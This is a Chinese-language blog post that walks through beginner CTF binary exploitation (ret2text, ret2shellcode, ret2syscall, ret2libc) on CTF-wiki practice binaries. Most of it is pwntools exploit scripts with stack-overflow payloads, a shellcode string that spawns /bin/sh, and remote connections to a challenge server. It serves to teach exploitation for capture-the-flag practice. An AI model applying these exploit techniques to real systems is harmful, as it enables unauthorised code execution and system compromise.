<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="a boy enjoying the world">
  <meta name="author" content="Magic Ding">
  <meta name="keywords" content="">
  <title>pwn入门（1）basicROP - unkn0wn</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css" />

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link  rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css" />

<link  rel="stylesheet" href="/css/main.css" />


  <link defer rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />


<!-- 自定义样式保持在最底部 -->


<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>unkn0wn</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">分类</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期一, 五月 11日 2020, 5:17 下午
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    1.3k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      6 分钟
                  </span>
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  <span id="busuanzi_container_page_pv" class="post-meta" style="display: none">
                    <i class="far fa-eye" aria-hidden="true"></i>
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
              <p
                class="note note-warning">本文最后更新于：星期一, 五月 11日 2020, 5:18 下午</p>
            
            <div class="markdown-body">
              <blockquote>
<p>萌新开始了自己的pwn学习（感觉团队进步速度不够，准备带头拓展一下业务）接下来一段时间我将会抽出时间学习pwn，首先按照ctf wiki完成知识学习。</p>
</blockquote>
<h2 id="基本知识"><a href="#基本知识" class="headerlink" title="基本知识"></a>基本知识</h2><h3 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h3><p>栈溢出(stack overflow)指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。</p>
<p>发生栈溢出的前提：</p>
<ul>
<li>程序必须向栈上写入数据。</li>
<li>写入的数据大小没有被良好地控制。</li>
</ul>
<h3 id="危险函数"><a href="#危险函数" class="headerlink" title="危险函数"></a>危险函数</h3><p>输入函数：gets,scanf,vscanf</p>
<p>输出函数：sprintf</p>
<p>字符串：strcpy，strcat，bcopy</p>
<h3 id="确定填充长度"><a href="#确定填充长度" class="headerlink" title="确定填充长度"></a>确定填充长度</h3><p>确定变量到栈底的距离</p>
<blockquote>
<p>下面，我们用几个例子入门rop</p>
</blockquote>
<h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p><a href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text" target="_blank" rel="noopener">题目地址</a></p>
<p>函数中存在gets，怀疑栈溢出漏洞</p>
<p>存在 system(“/bin/sh”)，因此可以直接控制程序返回，payload如下：</p>
<pre><code class="python">#!/usr/bin/env python
#coding=utf8
from pwn import *
context.log_level = &#39;debug&#39;   #显示调试的信息
context.terminal = [&#39;gnome-terminal&#39;,&#39;-x&#39;,&#39;bash&#39;,&#39;-c&#39;]   #？

local = 1  #设置是本地还是远程渗透

if local:
    p = process(&#39;./te&#39;)
else:
    p=remote(&#39;111.198.29.45&#39;,43732)
    pass

sys_addr=0x804863a
payload = &quot;A&quot;*0x6c+&#39;a&#39;*4 + p32(sys_addr)

def choose2():
    #p.recvuntil(&quot;please input\n&quot;)  这个在一般情况是需要添加的  可是这个题不知道为什么添加就不执行shell了
        p.recvuntil(&quot;anything?\n&quot;)
        p.sendline(payload)

#raw_input()  用来断在开始的位置
#gdb.attach(p)  可以用动态调试

    p.interactive()

choose2()</code></pre>
<h2 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h2><h3 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h3><p>shellcode是一串汇编代码，主要功能是获取目标系统的shell，一般来说需要我们自己填充shell，填充shell需要一段可执行的空间。</p>
<p>下面来看<a href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2shellcode/ret2shellcode-example/ret2shellcode" target="_blank" rel="noopener">例题</a></p>
<p>仍然是gets函数，这次没有控制函数，但是有一段可执行的bss，写入shellcode</p>
<pre><code class="python">#!/usr/bin/env python
#coding=utf8
from pwn import *
context.log_level = &#39;debug&#39;   #显示调试的信息
context.terminal = [&#39;gnome-terminal&#39;,&#39;-x&#39;,&#39;bash&#39;,&#39;-c&#39;]   #？

context(os=&#39;linux&#39;,arch=&#39;i386&#39;,log_level=&#39;debug&#39;)

local = 1  #设置是本地还是远程渗透

if local:
    p = process(&#39;./te&#39;)
else:
    p=remote(&#39;111.198.29.45&#39;,43732)
    pass

shellcode = &quot;\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34&quot;
bss_addr=0x804a080
payload = shellcode.ljust(112,&#39;a&#39;) + p32(bss_addr)

def choose2():
    #p.recvuntil(&quot;please input\n&quot;)  这个在一般情况是需要添加的  可是这个题不知道为什么添加就不执行shell了
        p.recvuntil(&quot;!!!\n&quot;)
        p.sendline(payload)

#raw_input()  用来断在开始的位置
#gdb.attach(p)  可以用动态调试

    p.interactive()

choose2() </code></pre>
<h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><p>返回一串系统调用，系统调用示例如下：</p>
<pre><code>execve(&quot;/bin/sh&quot;,NULL,NULL)</code></pre><pre><code class="python">#!/usr/bin/env python
#coding=utf8
from pwn import *
context.log_level = &#39;debug&#39;   #显示调试的信息
context.terminal = [&#39;gnome-terminal&#39;,&#39;-x&#39;,&#39;bash&#39;,&#39;-c&#39;]   #？

context(os=&#39;linux&#39;,arch=&#39;i386&#39;,log_level=&#39;debug&#39;)

local = 1  #设置是本地还是远程渗透

if local:
    p = process(&#39;./te&#39;)

else:
    p=remote(&#39;111.198.29.45&#39;,43732)

    pass

p1=0x80bb196
p2=0x806eb90
s1=0x80be408
sys=0x8049421
payload=&#39;A&#39;*0x6c+&#39;a&#39;*4+p32(p1)+p32(0xb)+p32(p2)+p32(0)+p32(0)+p32(s1)+p32(sys)

def choose2():

        p.recvuntil(&quot;do?\n&quot;)
        p.sendline(payload)

#raw_input()  用来断在开始的位置
#gdb.attach(p)  可以用动态调试

    p.interactive()

choose2()</code></pre>
<h2 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h2><h3 id="基本"><a href="#基本" class="headerlink" title="基本"></a>基本</h3><p><a href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc1/ret2libc1" target="_blank" rel="noopener">题目地址</a></p>
<p>返回执行system函数即可</p>
<pre><code class="python">#!/usr/bin/env python

from pwn import *



sh = process(&#39;./ret2libc1&#39;)



binsh_addr = 0x8048720

system_plt = 0x08048460

payload = flat([&#39;a&#39; * 112, system_plt, &#39;b&#39; * 4, binsh_addr])

sh.sendline(payload)



sh.interactive()</code></pre>
<h3 id="构造字符串"><a href="#构造字符串" class="headerlink" title="构造字符串"></a>构造字符串</h3><p>这道题中没有”/bin/sh”，我们需要手动把这个字符串输进程序</p>
<pre><code class="python">#!/usr/bin/env python
#coding=utf8
from pwn import *
context.log_level = &#39;debug&#39;   #显示调试的信息
context.terminal = [&#39;gnome-terminal&#39;,&#39;-x&#39;,&#39;bash&#39;,&#39;-c&#39;]   #？

context(os=&#39;linux&#39;,arch=&#39;i386&#39;,log_level=&#39;debug&#39;)

local = 1  #设置是本地还是远程渗透

if local:
    p = process(&#39;./ret2libc2&#39;)

else:
    p=remote(&#39;111.198.29.45&#39;,43732)

    pass

gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
payload = flat([&#39;a&#39; * 112, gets_plt, pop_ebx, buf2, system_plt, 0xdeadbeef, buf2])

def choose2():

        p.recvuntil(&quot;What do you think ?&quot;)
        p.sendline(payload)
        # gdb.attach(p)  # 可以用动态调试
        p.sendline(&quot;/bin/sh&quot;)

#raw_input()  用来断在开始的位置


    p.interactive()

choose2()
</code></pre>
<h3 id="libc与随机地址"><a href="#libc与随机地址" class="headerlink" title="libc与随机地址"></a>libc与随机地址</h3><p>仍然是gets函数的栈溢出，去掉了system函数的地址。</p>
<p>基本的dump地址找libc库的思路</p>
<pre><code class="python">#!/usr/bin/env python
#coding=utf8
from pwn import *
from LibcSearcher import LibcSearcher

context.log_level = &#39;debug&#39;   #显示调试的信息
context.terminal = [&#39;gnome-terminal&#39;,&#39;-x&#39;,&#39;bash&#39;,&#39;-c&#39;]   #？

context(os=&#39;linux&#39;,log_level=&#39;debug&#39;)

local = 1  #设置是本地还是远程渗透

if local:
    p = process(&#39;./ret2libc3&#39;)
    #bin = ELF(&#39;./&#39;,checksec=False)
    #libc = ELF(&#39;/lib/x86_64-linux-gnu/libc.so.6&#39;,checksec=False)
else:
    p=remote(&#39;111.198.29.45&#39;,43732)
    #bin = ELF(&#39;./&#39;,checksec=False)
    #libc = ELF(&#39;/lib/x86_64-linux-gnu/libc.so.6&#39;,checksec=False)
    pass

ret2libc3 = ELF(&#39;./ret2libc3&#39;)
puts_plt=0x8048460
main_addr=0x8048618
puts_got=ret2libc3.got[&#39;puts&#39;]

payload=112*&#39;a&#39;+p32(puts_plt)+p32(main_addr)+p32(puts_got)

def choose2():
        p.recvuntil(&quot;Can you find it !?&quot;)
        p.sendline(payload)
        puts_addr = u32(p.recv()[0:4])
        libc = LibcSearcher(&#39;puts&#39;,puts_addr)
        libc_base = puts_addr - libc.dump(&#39;puts&#39;)
        system_addr = libc_base + libc.dump(&#39;system&#39;)
        binsh = libc_base + libc.dump(&#39;str_bin_sh&#39;)
        # p.recvuntil(&quot;!?&quot;)
        p.sendline(&#39;a&#39;*104+p32(system_addr)+p32(0x08048618)+p32(binsh))


        # gdb.attach(p)
    # raw_input()  用来断在开始的位置

    p.interactive()

choose2()</code></pre>

            </div>
            <hr>
            <div>
              <p>
                
                  <span>
                <i class="iconfont icon-inbox"></i>
                    
                      <a class="hover-with-bg" href="/categories/pwn%E5%AD%A6%E4%B9%A0/">pwn学习</a>
                      &nbsp;
                    
                  </span>&nbsp;&nbsp;
                
                
                  <span>
                <i class="iconfont icon-tag"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a>
                    
                      <a class="hover-with-bg" href="/tags/pwn/">pwn</a>
                    
                  </span>
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" target="_blank" rel="nofollow noopener noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
            </div>

            
              <!-- Comments -->
              <div class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script defer src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script defer src="//unpkg.com/valine/dist/Valine.min.js"></script>

  <script>
    var notify = 'false' === 'true';
    var verify = 'false' === 'true';
    var oldLoad = window.onload;
    window.onload = function () {
      new Valine({
        el: '#vcomments',
        notify: notify,
        verify: verify,
        app_id: "LqCnV94o57WsMsK3Ol2Hd5NM-gzGzoHsz",
        app_key: "PfNVPynXwQu9zeyeUwnExVYv",
        placeholder: "说点什么",
        avatar: "/retro",
        meta: ['nick', 'mail', 'link'],
        pageSize: "10",
      });
      oldLoad && oldLoad();
    };
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://valine.js.org" target="_blank" rel="nofollow noopener noopener">comments
      powered by Valine.</a></noscript>


              </div>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    </div>
    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var post = $('#post');
      var toc = $('#toc');
      var tocLimMax = post.offset().top + post.height() - navHeight;

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = $('#board-ctn').css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>







  <script defer src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "pwn入门（1）basicROP&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script defer src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
